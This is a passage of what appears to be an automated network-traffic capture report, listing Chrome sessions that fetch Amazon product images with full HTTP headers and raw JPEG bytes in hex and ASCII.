                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC939INData Raw: 2c 7a 47 ce 82 f2 a5 5c c5 a4 89 b1 f8 f3 42 d1 62 b3 cc 3a 77 12 1d bf 81 03 87 ff c4 00 28 10 01 00 02 01 02 05 04 03 01 01 01 00 00 00 00 00 01 00 11 21 31 71 10 40 41 51 81 61 91 a1 b1 20 c1 f0 d1 70 e1 ff da 00 08 01 01 00 01 3f 10 ff 00 9e 39 d5 99 e8 3b cb 9f 58 87 0e 17 32 9e a0 10 1d 02 c2 db 20 93 a8 3e 29 f8 c4 3e 95 6d 2d 60 3b 1c 6d 3d 05 00 67 10 94 c0 62 41 51 cd 87 de a6 24 8e 91 72 03 aa ba a6 dc d2 92 c7 03 d5 91 c6 98 09 79 12 ca 06 82 2f f1 78 43 56 ee 84 37 e4 0c 38 54 e4 5c 47 a1 ec 3a fd c1 06 4a cf 4a 76 55 a2 5c 6b 4d 9b ca 6e 33 b1 14 2c 5e c1 d7 d5 d0 22 e2 c6 eb d5 e9 2f f9 4d 7d 75 d8 d2 79 7e b8 32 ab d1 7b e9 8b a4 8f 43 db 9b e5 3c 3a b8 18 00 2e 77 dd 81 dc 7f c9 53 a2 e7 0e 97 5b e4 3c 8f c7 fd 20 5d 3a 0d 4f 65 68 f4 b5
                                                                                                                                                                                                                                                                      Data Ascii: ,zG\Bb:w(!1q@AQa p?9;X2 >)>m-`;m=gbAQ$ry/xCV78T\G:JJvU\kMn3,^"/M}uy~2{C<:.wS[< ]:Oeh


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      56192.168.2.549789151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC611OUTGET /images/I/41BEfYOD4rL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC656INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 6016
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 6201fc5c-ab9a-4e74-b142-9e1887fa54d4
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Sun, 19 Sep 2021 18:09:19 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Tue, 16 Aug 2044 06:09:45 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 44334
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100174-IAD, cache-ewr-kewr1740062-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 2f 00 01 00 00 07 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 09 01 02 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 dc b0 00 00 00 00 00 00 00 00 00 00 00 00 01 e5 b9 80 f5
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"/
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: fe a9 35 3f 56 7c a9 e5 ea 4f c1 17 58 03 ab 26 f0 ef d1 7b 3f 2a 5c 3d 53 c4 16 5a ac 39 e8 ca b6 f9 b0 aa 8f 62 58 72 46 51 45 6e ab 42 2e 74 82 59 19 64 6e 89 b9 99 9a ce e5 e8 a5 23 b3 35 bd eb 35 bd e4 dc bf 6f e2 2c a1 17 76 76 98 df c2 1a 3d 96 a8 3e 33 11 96 d7 2f b6 68 22 42 d2 75 83 3b ba f4 49 d5 87 f2 98 43 ea b2 0b dd 34 43 17 eb ec c7 14 f1 0b bf 51 4c 79 cb 1d 70 38 55 15 96 9a 6e 7a 70 cf b1 dc 23 c4 d7 5b 68 98 d4 4e 28 92 06 56 9c 45 07 66 4e 18 2e 38 ae 28 ac 19 34 1a 3d 19 74 64 42 e3 fd 77 33 45 e6 12 47 6c 97 20 4a 1d 8e e4 1f eb 9a 09 a6 09 34 c7 fc d5 62 fe 56 a9 3e a7 54 eb c7 54 27 ac 3b fc f8 92 27 24 a5 f2 ac b0 65 6b 2d b2 6c 4c 48 76 3a e8 f3 a7 74 fe 5a 59 41 a5 26 2b 1e 99 a7 92 ab 28 48 d7 87 93 4b 37 0d 48 25 d8 d6 8b 98
                                                                                                                                                                                                                                                                      Data Ascii: 5?V|OX&{?*\=SZ9bXrFQEnB.tYdn#55o,vv=>3/h"Bu;IC4CQLyp8Unzp#[hN(VEfN.8(4=tdBw3EGl J4bV>TT';'$ek-lLHv:tZYA&+(HK7H%
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: cf d1 96 79 02 7b d9 d3 81 7b 6d b9 86 52 5e e3 ba ca 51 07 df 2f 89 69 0c 7e 2e 63 22 db f6 8e e0 d3 6b 1e 09 96 7d 62 ce 8b f8 3c 6a 99 30 23 23 fe 50 7f b1 03 db cc 27 2e 3e 2d 65 59 7a e4 b0 38 7d c4 7b 1e 0b 35 e2 bf b4 d5 c8 f4 04 10 28 36 47 f6 44 e5 6c 59 86 7e f6 59 c1 e4 88 63 0d 31 52 a1 6f 6d ed d6 42 f7 74 40 0e cb fb 43 f7 09 e1 dc 0e 84 23 d8 10 f5 54 e0 9f 19 23 d8 8f 2b d8 26 38 ea 3e 2c e8 96 a1 c9 13 7d 04 4b 67 25 ed 74 f8 16 7c de 8b 0c 1a 1b 67 a0 a7 46 af f5 66 3d 78 1d 5c 10 cd 7f b0 2e 7a 20 8b 93 23 55 49 ea 29 8a a3 0e 7b 23 09 9f 26 da ed d0 ee 56 4f 3d a1 ef c0 b0 35 2c 6a 24 75 51 b8 a1 04 55 c6 25 a7 aa 89 58 87 04 06 bb 4e 49 c5 04 1d c3 bc 9c eb b8 45 9a 42 b1 32 c7 d0 a8 f1 c8 d1 d3 04 82 67 ae 8a f5 24 ba 33 a1 f2 43 10
                                                                                                                                                                                                                                                                      Data Ascii: y{{mR^Q/i~.c"k}b<j0##P'.>-eYz8}{5(6GDlY~Yc1RomBt@C#T#+&8>,}Kg%t|gFf=x\.z #UI){#&VO=5,j$uQU%XNIEB2g$3C
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: 9d f9 e9 92 3d 3d 27 95 5c f7 be e3 c6 f8 7c fe f5 38 7d be 7f 5d a6 25 f8 df 9b ff 00 6c ae 32 38 9f 3c 03 e8 9f e5 d2 ff 00 33 86 df 5a fe 6f 3f a2 67 8b 05 b2 f3 a6 1a 1e 93 e2 8c 79 5f 8b 61 b0 f9 e3 ff 00 dc 1c 66 fe 41 e5 e6 ec 3f 9f a7 3f 84 f3 db 3b df 71 7f 16 36 c5 b9 5d 13 1d 2a bb 14 71 d7 ac dd c2 0f a1 e1 95 f4 47 b2 ee 01 d7 d3 26 91 c5 8a a0 bb 82 9f c4 00 1a f3 6b 61 bd 0d f5 f2 f6 27 d0 87 02 fb dd 88 f6 12 9e 3c b2 e4 d7 cc d6 fd ff 00 6c dd ef 8f 4a 6e 79 a6 fd 1f db 1d 37 e5 cb fc 59 74 78 bf 83 7b df 44 5e 9c 53 c9 fd d9 94 f7 7f 6e 60 b3 13 1b f3 cc 13 a7 d4 4f 93 38 1f b5 ce 11 fc b2 d7 69 38 d8 f8 7e d7 3d 7d 76 cf 79 18 56 7d 06 c7 db fa 29 e7 7f c9 fe b9 ff 00 d8 f7 f8 38 d7 7a da 14 2b e3 02 34 ff 00 0e d8 d6 91 97 bd 0e ce 77
                                                                                                                                                                                                                                                                      Data Ascii: =='\|8}]%l28<3Zo?gy_afA??;q6]*qG&ka'<lJny7Ytx{D^Sn`O8i8~=}vyV})8z+4w
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC504INData Raw: d1 ab 5a e4 a6 ad 7b de 8d 14 3b 14 ab b7 0c 23 50 82 0f 13 d4 a9 8c 85 68 7f 33 73 e3 2e d0 7c bf d0 e4 1f fc 9f e9 65 e5 d3 fd cd f8 79 a9 46 95 8a c8 84 e4 70 b2 99 6a 7a 30 91 81 62 51 80 39 da bf ac 41 84 f2 b7 78 12 cb 94 5b 86 c8 eb 75 db 80 80 04 53 92 a9 75 b8 ec c1 c0 01 d8 1e 18 74 c9 80 01 6b a3 d5 c8 c1 51 4f 50 73 bc 5d 51 4a 1e a0 5d 33 89 ab 79 c1 ab b2 68 19 f3 66 f4 df da 60 f7 7d 0a c6 ed f9 a7 4c 5b 84 10 86 12 41 44 ee 38 6c 72 dc ff 00 a2 7c 19 e4 3d 1f 89 8e 6f d1 f8 43 35 b4 bb e5 54 de 3b e5 9c f9 9f 23 cf 37 f1 9f 39 c3 bd 58 ff 00 c0 65 a9 17 b1 32 ce e8 9f 18 3e 85 ee cf df 0a f6 c7 dc 7f 7b fd bd fc 10 bc 7b 12 c6 82 92 9a c2 5a 8a 7b 78 ab 56 21 86 92 a0 c1 ab c5 70 14 f0 04 00 ee 91 14 fe ca 6b 11 f2 0b ec 43 f4 3b 26 07 d1
                                                                                                                                                                                                                                                                      Data Ascii: Z{;#Ph3s.|eyFpjz0bQ9Ax[uSutkQOPs]QJ]3yhf`}L[AD8lr|=oC5T;#79Xe2>{{Z{xV!pkC;&


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      57192.168.2.54978218.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC665OUTGET /images/G/39/Associates/BTS24_AE_GW_ADIB_DC_758x608_EN._SY304_CB567277961_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 13784
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 8383ea90-8227-4812-907e-280cdfbef870
                                                                                                                                                                                                                                                                      Date: Thu, 15 Aug 2024 14:51:07 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 15 Aug 2024 07:23:17 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-249,/images/G/39/Associates/BTS24_AE_GW_ADIB_DC_758x608_EN
                                                                                                                                                                                                                                                                      Expires: Wed, 10 Aug 2044 14:51:07 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-249 /images/G/39/Associates/BTS24_AE_GW_ADIB_DC_758x608_EN
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 2ef9ad1c8e8d306617a72c1e978a7716.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 348355
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: pTM66OD_Fbr2Z58srbktg19OAENb4wKdEK6FQxrnWV5o5BTMbBThhQ==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC13784INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 30 01 7b 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 03 02 01 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 04 02 03 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d2 8f a2 fa 40 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*0{"5@


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      58192.168.2.549791151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC611OUTGET /images/I/31EO3Wv+aeL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 3718
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 674cc0b4-5696-4ed7-80bf-23243dcbb6aa
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 31 Oct 2023 09:32:16 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Sun, 31 Jul 2044 09:09:57 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 704882
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000071-IAD, cache-ewr-kewr1740025-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 31 00 01 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 09 04 05 06 07 01 02 08 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f6 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"1X
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: b5 2f 6f 64 dd 3c dc bc dc 38 dc 38 dc 38 d7 71 ae e3 59 c6 b2 9a aa 6a a8 e9 15 50 a5 e2 8f c3 57 c5 28 9d 85 75 cb 08 b6 17 b9 62 c5 8b 16 2c 58 b1 62 c5 8b 16 2c 58 a5 e2 8f c1 5b 35 63 24 c5 ae af a9 ee d7 47 77 fe ba 72 18 48 61 21 84 86 12 18 48 61 20 c5 95 a9 63 52 53 39 47 ac ae ec 61 21 84 86 12 18 48 61 21 84 86 9c 83 ee cf d9 b5 f5 2b 66 b6 8a 5a c7 c9 8b be fb 21 6b 7f a7 6b 96 4f eb 9f ff c4 00 20 11 00 02 02 02 02 02 03 00 00 00 00 00 00 00 00 00 00 01 11 12 10 21 20 31 02 30 41 50 60 ff da 00 08 01 02 01 01 08 00 fa f8 2a 54 a1 42 85 08 20 8e 72 4b 36 6c d8 93 18 fa f4 2f 1f 97 72 e5 8b 16 78 7d 0b ae 6d 89 28 dc a2 51 28 94 34 3e 89 e6 f0 91 54 42 34 37 88 f4 a2 a5 4a 90 41 04 72 92 71 2c b1 62 49 27 f0 1f ff c4 00 18 11 01 01 00 03 00 00
                                                                                                                                                                                                                                                                      Data Ascii: /od<888qYjPW(ub,Xb,X[5c$GwrHa!Ha cRS9Ga!Ha!+fZ!kkO ! 10AP`*TB rK6l/rx}m(Q(4>TB47JArq,bI'
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC962INData Raw: 00 00 01 00 11 21 31 f0 10 41 51 61 71 91 d1 30 81 c1 f1 a1 b1 e1 70 20 40 ff da 00 08 01 01 00 01 3f 10 ff 00 38 6e 79 20 02 d6 55 53 c5 f8 97 27 df 1c 9f 7c 72 7d f1 c9 f7 c7 27 dd 1c 9f 74 72 7d f1 cb f7 c7 dd 63 ee b1 c9 77 c7 2d dd 1f 65 8f b2 c7 d9 63 95 ef 8e 4b be 3e cb 07 df cf fc c1 e6 a2 57 10 58 fa 5d 06 a6 4b 07 82 42 42 42 43 66 dc 89 7e 1e c4 17 0f 68 9c 53 b8 0d 6a a2 24 61 a0 8c 0c 0f 82 a5 ef 51 97 ca c3 d3 f3 18 74 ef 5b 1e b9 12 33 09 b0 32 13 3a e4 e6 70 82 58 df 2e e2 58 8b e4 47 cb bc 3e 00 cd 15 88 73 81 4b 56 e1 c1 21 a7 d6 65 f3 3f 26 61 38 cb 3a 93 9c cb f3 8b e7 2d ce 0b 9c 52 54 14 33 15 c0 61 df 4b 3d cd 1d 74 91 96 cd fd a8 7b 93 a7 19 66 f5 19 74 46 06 2b 1a 42 3b 10 18 a1 d4 2d 04 b5 47 80 bf 17 e7 19 fb 9e 66 2b 01 94 30
                                                                                                                                                                                                                                                                      Data Ascii: !1AQaq0p @?8ny US'|r}'tr}cw-ecK>WX]KBBBCf~hSj$aQt[32:pX.XG>sKV!e?&a8:-RT3aK=t{ftF+B;-Gf+0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      59192.168.2.549792151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC611OUTGET /images/I/31b7GLJLg9L._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 6012
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: d131d3dc-871e-4385-b41b-dde6136f5208
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 12 Sep 2023 23:26:32 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Sun, 31 Jul 2044 08:06:36 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 1327098
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100026-IAD, cache-nyc-kteb1890066-NYC
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 01 00 02 02 02 03 00 00 00 00 00 00 00 00 00 00 00 07 08 05 06 03 04 01 02 09 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"2`
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: 3d 18 ba 2c 84 ce 5b 87 0f 72 59 a6 70 38 fd d4 8a 5a e3 2c 61 ae 36 26 1d 5d f8 65 c3 6d 99 3e 86 58 8e 56 83 c4 2f 27 41 ff 00 1e 6a ae 58 eb 03 46 d8 9f b9 39 bb 91 49 1b b4 6d 66 5e a5 1f 48 bb 7e 55 84 7d d6 89 d4 7e ea 45 ff 00 98 ac 6b 6d 17 6e 39 df 71 c3 6b f0 65 8a f7 51 f8 85 e4 ea 81 80 53 37 97 ad d0 58 6f 70 7a 3f 9b 2b b2 44 11 bb cd d6 68 2c 27 ba 2d 23 f7 52 2f 38 c1 95 2f e7 8e 71 ff 00 a8 75 8c a7 d2 eb 21 04 3a ca b2 f5 5a 22 13 16 58 9f 74 1e 21 79 3a c6 42 33 d5 20 2e c4 85 74 31 62 c4 a5 6e dc 64 16 23 ca 31 c4 fd 85 1a a5 8d 0a 87 bd a3 f7 52 20 f4 46 a9 f1 cd 7b 93 58 83 3e 87 41 09 45 e4 36 59 bd ac 11 33 0a c2 36 b3 b3 f8 8e b0 df 83 86 6b f0 32 81 a9 6c 1e 93 1e 35 59 cf ab a6 51 7b a9 10 7a 23 54 b8 e7 e2 d2 51 35 4a eb d7 dc
